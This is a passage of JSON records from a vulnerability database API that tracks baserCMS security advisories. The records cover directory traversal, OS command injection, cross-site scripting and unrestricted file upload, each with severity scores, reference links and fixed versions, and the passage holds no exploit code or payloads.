            "summary": "baserCMS Directory Traversal vulnerability in Form submission data management Feature\nThere is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.8 and earlier versions\n\n### Vulnerability\nThere is a possibility that information on the server may be obtained by a user who is logged in to the management screen.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_45547161\n\n### Credits\nShiga Takuma@BroadBand Security, Inc",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43648",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00289",
                            "scoring_system": "epss",
                            "scoring_elements": "0.52624",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43648"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_81174674",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_81174674"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43648",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43648"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hmqj-gv2m-hq55",
                    "reference_id": "GHSA-hmqj-gv2m-hq55",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-hmqj-gv2m-hq55"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55",
                    "reference_id": "GHSA-hmqj-gv2m-hq55",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.8.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"
                }
            ],
            "aliases": [
                "CVE-2023-43648",
                "GHSA-hmqj-gv2m-hq55"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47096?format=api",
            "vulnerability_id": "VCID-uedz-j2vn-cbea",
            "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-51450",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00755",
                            "scoring_system": "epss",
                            "scoring_elements": "0.73646",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-51450"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_09767360",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_09767360"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51450",
                    "reference_id": "CVE-2023-51450",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51450"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-77fc-4cv5-hmfr",
                    "reference_id": "GHSA-77fc-4cv5-hmfr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-77fc-4cv5-hmfr"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr",
                    "reference_id": "GHSA-77fc-4cv5-hmfr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"
                }
            ],
            "aliases": [
                "CVE-2023-51450",
                "GHSA-77fc-4cv5-hmfr"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=api",
            "vulnerability_id": "VCID-y2sz-c6vb-pkdp",
            "summary": "baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19955",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7",
                    "reference_id": "GHSA-m9g7-rgfc-jcm7",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30877",
                "GHSA-m9g7-rgfc-jcm7"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=api",
            "vulnerability_id": "VCID-zqd4-rdem-jfgk",
            "summary": "baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious Javascript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01615",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm",
                    "reference_id": "GHSA-jmq3-x8q7-j9qm",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30879",
                "GHSA-jmq3-x8q7-j9qm"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44709?format=api",
            "vulnerability_id": "VCID-zsgc-fnen-b7a6",
            "summary": "Unrestricted Upload of File with Dangerous Type\nbaserCMS is a content management system. Prior to version 4.7.5, any file can be uploaded through the management system of baserCMS. Version 4.7.5 contains a patch.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25655",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00561",
                            "scoring_system": "epss",
                            "scoring_elements": "0.68669",
                            "published_at": "2026-06-04T12:55:00Z"
                        },
                        {
                            "value": "0.00561",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6871",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25655"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25655",
                    "reference_id": "CVE-2023-25655",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25655"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mfvg-qwcw-qvc8",
                    "reference_id": "GHSA-mfvg-qwcw-qvc8",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-mfvg-qwcw-qvc8"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8",
                    "reference_id": "GHSA-mfvg-qwcw-qvc8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/64369?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.7.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
